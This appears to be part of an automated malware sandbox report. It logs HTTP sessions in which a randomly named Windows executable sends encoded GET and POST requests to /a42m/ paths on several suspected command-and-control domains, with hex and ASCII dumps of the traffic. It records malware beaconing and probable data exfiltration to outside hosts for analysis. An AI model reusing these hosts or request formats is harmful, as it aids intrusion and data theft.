                          Data Ascii: vH5=DYqRhV+0yPO3RFgG4v9Zr5CbhaEEMTH07bweknLU8kpVu6/PLqCXQjEJZzuAtDRLxGNAZGfd7HKPJ2fo4yYbnpgf79iFbnNC6vwc9ecOO1KSbMLX5x3b/qP5TQ5kEgwrBPaL4P8a3IsGCJ2A/beS4rvSCb1Okbl70pKWUKqwgy36tTdUWZf9GR/oko3+2uzbO/9qfgTe+SlAEBgyL/gyV8XwRJzP7P2XBb7yT0z/TqyKvAbYW98zEXF1C4ov6okilg5QxPryCAieod7YqbJRM2k35Q6TukF6cAOwxyn1TwFGBOLIhaNFT7yE+p1fhSNAsY2o9Bkir2MLm2tpe9AO9RzBGmSPCt61u+SaEUxCZHEHrQ1TZ/v4DDpPisHFuM5OvCQ4zhB/51HZAoperkqutJZSCyQ6DhEZy0f9f8KMnVTKCBOTRvEWL/SPlJWr6h+tNfEpBxE2gVoyJzD2b5Z2wbqt6SplxbJDCZ8BNuQWC0ks0FjaiYSzebLIYY3Cc498LnoghG8WC/1PVymUkx+1Lp+52EWSeRMtyO6PurKWQkeqSbf+b3706qqp/Rpmtb441YS3S1oPhhNCnMOYXV4AfocEH5prEJofX3AHPv9nsLYK7nlv33apNlfeivH1je5fzFYlKougq7PVPTji8B0jz0EgKC6+RCefV2IOphoIRnsWueUkDCVNNWKf3eTdBdMlzLFMsJTZeWmTS1VGsyKajjqZkFcQ5j+t/xyUBXMEGlBinJiLY6NZJWHMOOrYE8deE9OoO/A/gXflwr9I4doHEx7QXrIoon1rUoibpyvmdAbH2daT4E59mMDvSaScSQBHDcVCA3kUJdFH+On57fED30t8MWoQ9hwfdmcB18nN0IUizYGY4AgmxKdHbxOqL2cqfjKZe1Fk1aNZvxiH2hfPY2FxNF5lWYAjnCFLV3cYqxh8HCDINGfJ3F1Euf+I5rGIMtmj8cV7kFYeZj+51HvrLW85fc1wOyBwSFHdJcGU0QnRW46o [TRUNCATED]
                          May 23, 2024 15:17:30.074572086 CEST533INHTTP/1.1 404 Not Found
                          Date: Thu, 23 May 2024 13:17:29 GMT
                          Server: Apache
                          Content-Length: 389
                          Connection: close
                          Content-Type: text/html
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          8192.168.2.553661162.0.237.22807116C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          TimestampBytes transferredDirectionData
                          May 23, 2024 15:17:32.170289993 CEST488OUTGET /a42m/?vH5=OaCxij+az8CWZkVSgZ9BvYP+nrAHPzHJsZdPmSHU0RFVoK/pLfrBJ2MjeSz+pAxrgiF9enqzkwmMWhrDz0ZQ4sIJ7tOHf1xt78d5/aV4E0eta/TI3w61kMO4VihKAD9uew==&R0nl4=f64p HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Host: www.crimsoncascade.xyz
                          Connection: close
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          May 23, 2024 15:17:32.796171904 CEST548INHTTP/1.1 404 Not Found
                          Date: Thu, 23 May 2024 13:17:32 GMT
                          Server: Apache
                          Content-Length: 389
                          Connection: close
                          Content-Type: text/html; charset=utf-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          9192.168.2.55366284.32.84.32807116C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          TimestampBytes transferredDirectionData
                          May 23, 2024 15:17:38.848829985 CEST777OUTPOST /a42m/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Accept-Encoding: gzip, deflate, br
                          Host: www.xn--bb55rtp-9va2p.store
                          Origin: http://www.xn--bb55rtp-9va2p.store
                          Content-Type: application/x-www-form-urlencoded
                          Cache-Control: max-age=0
                          Content-Length: 204
                          Connection: close
                          Referer: http://www.xn--bb55rtp-9va2p.store/a42m/
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Raw: 76 48 35 3d 66 72 35 47 7a 56 6e 4f 45 31 62 59 43 52 2f 48 37 6b 65 55 62 76 6d 62 74 30 70 66 43 61 71 32 68 67 6b 77 68 55 73 6b 77 4a 66 70 56 51 39 37 2b 4f 4c 79 74 38 53 63 2b 55 6b 4a 50 47 2f 51 45 38 37 65 71 6e 67 79 38 78 32 46 76 6a 6c 6b 57 2f 48 61 55 30 58 44 4b 4a 43 6d 6f 35 34 76 5a 77 6b 66 42 44 4e 49 31 57 6c 6a 78 33 30 57 37 43 66 35 4d 36 63 75 62 6c 79 6b 39 51 64 71 33 38 69 78 4a 56 42 56 45 78 41 4b 4e 69 34 4b 46 55 54 63 4e 75 72 7a 75 5a 30 4a 6d 64 50 50 6d 58 2f 61 62 50 68 39 46 5a 6f 68 70 4e 49 34 4c 5a 43 4a 74 6a 57 64 6e 6b 37 38 78 68 34 49 6a 2f 43 48 7a 4a 51 3d
                          Data Ascii: vH5=fr5GzVnOE1bYCR/H7keUbvmbt0pfCaq2hgkwhUskwJfpVQ97+OLyt8Sc+UkJPG/QE87eqngy8x2FvjlkW/HaU0XDKJCmo54vZwkfBDNI1Wljx30W7Cf5M6cublyk9Qdq38ixJVBVExAKNi4KFUTcNurzuZ0JmdPPmX/abPh9FZohpNI4LZCJtjWdnk78xh4Ij/CHzJQ=


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          10192.168.2.55366384.32.84.32807116C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          TimestampBytes transferredDirectionData
                          May 23, 2024 15:17:41.385505915 CEST797OUTPOST /a42m/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Accept-Encoding: gzip, deflate, br
                          Host: www.xn--bb55rtp-9va2p.store
                          Origin: http://www.xn--bb55rtp-9va2p.store
                          Content-Type: application/x-www-form-urlencoded
                          Cache-Control: max-age=0
                          Content-Length: 224
                          Connection: close
                          Referer: http://www.xn--bb55rtp-9va2p.store/a42m/
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Raw: 76 48 35 3d 66 72 35 47 7a 56 6e 4f 45 31 62 59 43 30 33 48 33 6a 4b 55 64 50 6d 55 6f 30 70 66 4c 36 72 39 68 67 34 77 68 51 38 30 33 37 4c 70 56 78 68 37 35 4c 33 79 73 38 53 63 31 30 6c 44 4c 47 2f 68 45 38 47 6a 71 69 67 79 38 77 53 46 76 68 74 6b 52 4d 2f 46 58 45 58 42 47 70 43 6b 73 35 34 76 5a 77 6b 66 42 48 6c 6d 31 57 74 6a 77 48 6b 57 36 6a 66 36 53 71 63 74 61 6c 79 6b 33 77 64 75 33 38 6a 65 4a 58 6b 2b 45 7a 6f 4b 4e 6a 49 4b 45 46 54 66 58 2b 72 35 67 35 30 66 67 6f 36 56 72 57 44 6b 57 65 45 30 51 75 4d 59 68 62 6c 53 52 37 4b 68 2b 44 36 6c 33 33 7a 4c 67 52 5a 68 35 63 53 33 74 65 46 69 38 66 30 58 32 71 4e 78 46 38 33 64 72 72 32 56 42 4f 45 57
                          Data Ascii: vH5=fr5GzVnOE1bYC03H3jKUdPmUo0pfL6r9hg4whQ8037LpVxh75L3ys8Sc10lDLG/hE8Gjqigy8wSFvhtkRM/FXEXBGpCks54vZwkfBHlm1WtjwHkW6jf6Sqctalyk3wdu38jeJXk+EzoKNjIKEFTfX+r5g50fgo6VrWDkWeE0QuMYhblSR7Kh+D6l33zLgRZh5cS3teFi8f0X2qNxF83drr2VBOEW


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          11192.168.2.55366484.32.84.32807116C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          TimestampBytes transferredDirectionData
                          May 23, 2024 15:17:43.918405056 CEST1814OUTPOST /a42m/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Accept-Encoding: gzip, deflate, br
                          Host: www.xn--bb55rtp-9va2p.store
                          Origin: http://www.xn--bb55rtp-9va2p.store
                          Content-Type: application/x-www-form-urlencoded
                          Cache-Control: max-age=0
                          Content-Length: 1240
                          Connection: close
                          Referer: http://www.xn--bb55rtp-9va2p.store/a42m/
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Raw: 76 48 35 3d 66 72 35 47 7a 56 6e 4f 45 31 62 59 43 30 33 48 33 6a 4b 55 64 50 6d 55 6f 30 70 66 4c 36 72 39 68 67 34 77 68 51 38 30 33 37 54 70 56 6a 70 37 2f 6f 66 79 2b 73 53 63 34 55 6c 41 4c 47 2f 47 45 34 72 6b 71 69 63 69 38 7a 36 46 75 43 31 6b 51 39 2f 46 41 55 58 42 62 35 43 6c 6f 35 35 31 5a 30 49 54 42 44 42 6d 31 57 74 6a 77 46 73 57 36 79 66 36 56 61 63 75 62 6c 79 77 39 51 64 57 33 2f 54 6b 4a 58 78 46 45 43 49 4b 4e 44 59 4b 44 33 37 66 50 75 72 33 74 5a 31 63 67 6f 2f 4c 72 57 65 58 57 65 67 65 51 6f 38 59 77 36 41 53 55 2f 4b 45 76 51 32 68 78 48 58 46 35 33 46 45 36 38 53 76 6c 76 6c 32 68 64 45 76 78 64 46 38 51 59 50 55 79 61 79 2b 51 61 56 59 70 33 4b 79 37 35 5a 78 77 49 75 6f 4b 67 69 71 44 58 78 6c 6a 4c 36 51 41 41 41 7a 50 66 77 47 69 64 77 2f 56 32 54 75 30 36 38 69 2b 7a 70 74 4f 6a 31 6e 4d 62 4f 44 2f 36 72 30 51 62 53 72 57 67 33 79 6f 36 75 7a 2b 76 6a 4a 76 4f 54 5a 59 4d 34 44 34 74 71 37 61 6a 61 6d 73 52 42 6c 67 61 56 75 32 38 64 71 6e 43 58 64 57 4f 6e 7a 62 56 [TRUNCATED]
                          Data Ascii: vH5=fr5GzVnOE1bYC03H3jKUdPmUo0pfL6r9hg4whQ8037TpVjp7/ofy+sSc4UlALG/GE4rkqici8z6FuC1kQ9/FAUXBb5Clo551Z0ITBDBm1WtjwFsW6yf6Vacublyw9QdW3/TkJXxFECIKNDYKD37fPur3tZ1cgo/LrWeXWegeQo8Yw6ASU/KEvQ2hxHXF53FE68Svlvl2hdEvxdF8QYPUyay+QaVYp3Ky75ZxwIuoKgiqDXxljL6QAAAzPfwGidw/V2Tu068i+zptOj1nMbOD/6r0QbSrWg3yo6uz+vjJvOTZYM4D4tq7ajamsRBlgaVu28dqnCXdWOnzbVzUUhZl1ALti0iEIOo/U3+axGYxOb44N26Du7KpwQoY1UepzMBpsPk03urrC1PJEOiMEN5t4bhkPOaeL5G0yyi6eyc3E+GA8t4yQbph8tTNII/LqF7MEMbovUg2mWTYpamPb8bEF/auCzsjrF0N+xjnE10F9n3rqK3pc1AMug/UvaZLeXVFP+RWhMD7+ZEmwnCdgpLYjKpNhDpP5HAHWGjvhkP+iUIT8nCEfOCZRb6oioraHIONmE2xdQ1vIx8RtqY5b8nyIx1dOwHTj0WyVxgRMt7xW9ALbypr+kPVFlliNv22u5kTs06Jh7I4i9a0LafDpph34rYkD32W+O51L8IeE3J9kVfuh+FP7D2L5AseEm/EkNEt/dwir+3bkS+N3KiuFsewvjcw6BrgMGzUY7U3KOuy2CyrD3BKkH+HveWqaHYcpkCEf4/u/aBUWlLTiLuWz1nx4IrKZ5Io59k+X4M2xZmyDB57rfKZb9r8WXmH1+7kIFAD4+EFwJF1q3lVqDKIMSYqM1pLd/MWdZhD+05k5ZqsNiK4xcYzJGb0VKPEdTr2gkL0kOWAafekhhzC67Z2U2tn64sVGS5deqY/T048oounP0qa2nuvjpcUVkKqvvqnGOTjCWw7nlCXnn/UreO2zi/ay79ucQCDd9IyzMYZSEisNx9y8V7P [TRUNCATED]


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          12192.168.2.55366584.32.84.32807116C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          TimestampBytes transferredDirectionData
                          May 23, 2024 15:17:46.447711945 CEST493OUTGET /a42m/?R0nl4=f64p&vH5=SpRmwiWWWie0LiCX9EyQXvy6lxMcCKfTuTRukl4i+K/mOSJ9++mgtoeJyEwnF13dco3p6AsQh3ikhhdZe62TUGOhYKvcqIkBTBlrJzQRtlxjx1oX6jajL6xfb2K92Bka0g== HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Host: www.xn--bb55rtp-9va2p.store
                          Connection: close
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          May 23, 2024 15:17:46.911876917 CEST1236INHTTP/1.1 200 OK
                          Server: hcdn
                          Date: Thu, 23 May 2024 13:17:46 GMT
                          Content-Type: text/html
                          Content-Length: 10072
                          Connection: close
                          Vary: Accept-Encoding
                          alt-svc: h3=":443"; ma=86400
                          x-hcdn-request-id: 61ec0868920235e7131f57d2e2b58bf9-bos-edge3
                          Expires: Thu, 23 May 2024 13:17:45 GMT
                          Cache-Control: no-cache
                          Accept-Ranges: bytes
                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                          Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"
                          May 23, 2024 15:17:46.913451910 CEST1236INData Raw: 4f 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61
                          Data Ascii: Open Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600
                          May 23, 2024 15:17:46.917015076 CEST1236INData Raw: 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65
                          Data Ascii: x;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-c
                          May 23, 2024 15:17:46.920737982 CEST1236INData Raw: 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f
                          Data Ascii: r:#fff!important}.navbar{border-radius:0!important}.navbar-inverse{background-color:#36344d;border:none}.column-custom-wrap{padding-top:10px 20px}.badge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-
                          May 23, 2024 15:17:46.920758963 CEST1236INData Raw: 65 6c 63 6f 6d 65 2f 69 6d 61 67 65 73 2f 68 6f 73 74 69 6e 67 65 72 2d 6c 6f 67 6f 2e 73 76 67 20 61 6c 74 3d 48 6f 73 74 69 6e 67 65 72 20 77 69 64 74 68 3d 31 32 30 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c
                          Data Ascii: elcome/images/hostinger-logo.svg alt=Hostinger width=120></a></div><div class="collapse navbar-collapse" id=myNavbar><ul class="nav navbar-links navbar-nav navbar-right"><li><a href=https://www.hostinger.com/tutorials rel=nofollow><i aria-hidd
                          May 23, 2024 15:17:46.927788973 CEST1236INData Raw: 78 20 63 6f 6c 75 6d 6e 2d 77 72 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 31 32 20 63 6f 6c 2d 73 6d 2d 34 20 63 6f 6c 75 6d 6e 2d 63 75 73 74 6f 6d 2d 77 72 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 6f 6c 75 6d
                          Data Ascii: x column-wrap"><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title><span style=margin-right:8px>Buy website hosting </span><span class=badge>Save 90%</span></div><br><p>Extremely fast, secure and
                          May 23, 2024 15:17:46.930634022 CEST1236INData Raw: 28 29 7b 74 68 69 73 2e 75 74 66 31 36 3d 7b 64 65 63 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 66 6f 72 28 76 61 72 20 72 2c 65 2c 6e 3d 5b 5d 2c 74 3d 30 2c 61 3d 6f 2e 6c 65 6e 67 74 68 3b 74 3c 61 3b 29 7b 69 66 28 35 35 32 39 36 3d 3d
                          Data Ascii: (){this.utf16={decode:function(o){for(var r,e,n=[],t=0,a=o.length;t<a;){if(55296==(63488&(r=o.charCodeAt(t++)))){if(e=o.charCodeAt(t++),55296!=(64512&r)||56320!=(64512&e))throw new RangeError("UTF-16(decode): Illegal UTF-16 sequence");r=((1023
                          May 23, 2024 15:17:46.930655003 CEST1236INData Raw: 28 22 70 75 6e 79 63 6f 64 65 5f 62 61 64 5f 69 6e 70 75 74 28 32 29 22 29 3b 69 66 28 73 3e 4d 61 74 68 2e 66 6c 6f 6f 72 28 28 72 2d 66 29 2f 70 29 29 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 70 75 6e 79 63 6f 64 65 5f 6f 76 65 72
                          Data Ascii: ("punycode_bad_input(2)");if(s>Math.floor((r-f)/p))throw RangeError("punycode_overflow(1)");if(f+=s*p,s<(C=g<=i?1:i+26<=g?26:g-i))break;if(p>Math.floor(r/(o-C)))throw RangeError("punycode_overflow(2)");p*=o-C}if(i=n(f-l,h=m.length+1,0===l),Mat
                          May 23, 2024 15:17:46.930672884 CEST524INData Raw: 77 5b 64 5d 3f 31 3a 30 29 29 29 2c 75 3d 6e 28 66 2c 69 2b 31 2c 69 3d 3d 63 29 2c 66 3d 30 2c 2b 2b 69 7d 7d 2b 2b 66 2c 2b 2b 68 7d 72 65 74 75 72 6e 20 79 2e 6a 6f 69 6e 28 22 22 29 7d 2c 74 68 69 73 2e 54 6f 41 53 43 49 49 3d 66 75 6e 63 74
                          Data Ascii: w[d]?1:0))),u=n(f,i+1,i==c),f=0,++i}}++f,++h}return y.join("")},this.ToASCII=function(o){for(var r=o.split("."),e=[],n=0;n<r.length;++n){var t=r[n];e.push(t.match(/[^A-Za-z0-9-]/)?"xn--"+punycode.encode(t):t)}return e.join(".")},this.ToUnicode


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          13192.168.2.55366663.250.43.147807116C:\Program Files (x86)\WYnqDTcohWTLuYGfHVXqPgPPjvyizBZlKphwPdgHrUSvPXmyFbVimH\sXAKgqpSAiGEzhyDsUSKBxPWz.exe
                          TimestampBytes transferredDirectionData
                          May 23, 2024 15:17:52.007811069 CEST741OUTPOST /a42m/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en
                          Accept-Encoding: gzip, deflate, br
                          Host: www.fidyart.com
                          Origin: http://www.fidyart.com
                          Content-Type: application/x-www-form-urlencoded
                          Cache-Control: max-age=0
                          Content-Length: 204
                          Connection: close
                          Referer: http://www.fidyart.com/a42m/
                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Data Raw: 76 48 35 3d 65 54 79 59 34 62 2b 54 6a 43 63 6b 37 33 6c 31 33 6f 2b 43 51 35 75 32 35 62 71 4a 56 67 66 6b 47 73 79 59 30 79 46 42 58 55 56 7a 36 72 57 39 46 66 68 6b 6a 4a 46 69 37 79 7a 73 6d 57 38 61 6a 6c 2f 58 4f 44 73 6e 4c 4b 61 37 43 42 2b 35 68 79 69 4e 72 55 54 6e 68 34 33 4a 4e 7a 6c 56 69 37 6d 5a 35 4e 64 4c 78 49 62 35 66 4d 63 31 58 77 61 4e 6c 4c 69 70 45 53 75 36 55 71 70 36 44 79 34 6e 36 71 7a 71 74 35 64 44 41 72 58 39 75 76 49 7a 6e 6c 39 72 4a 79 47 53 36 56 33 78 76 47 4d 76 64 46 39 6f 36 52 46 56 71 41 4c 6f 4a 34 36 63 38 58 68 4c 6e 33 63 50 6e 42 72 6d 77 4b 63 50 4b 36 38 3d
                          Data Ascii: vH5=eTyY4b+TjCck73l13o+CQ5u25bqJVgfkGsyY0yFBXUVz6rW9FfhkjJFi7yzsmW8ajl/XODsnLKa7CB+5hyiNrUTnh43JNzlVi7mZ5NdLxIb5fMc1XwaNlLipESu6Uqp6Dy4n6qzqt5dDArX9uvIznl9rJyGS6V3xvGMvdF9o6RFVqALoJ46c8XhLn3cPnBrmwKcPK68=
                          May 23, 2024 15:17:52.631057978 CEST1236INHTTP/1.1 404 Not Found
                          content-type: text/html
                          date: Thu, 23 May 2024 13:17:52 GMT
                          transfer-encoding: chunked
                          connection: close
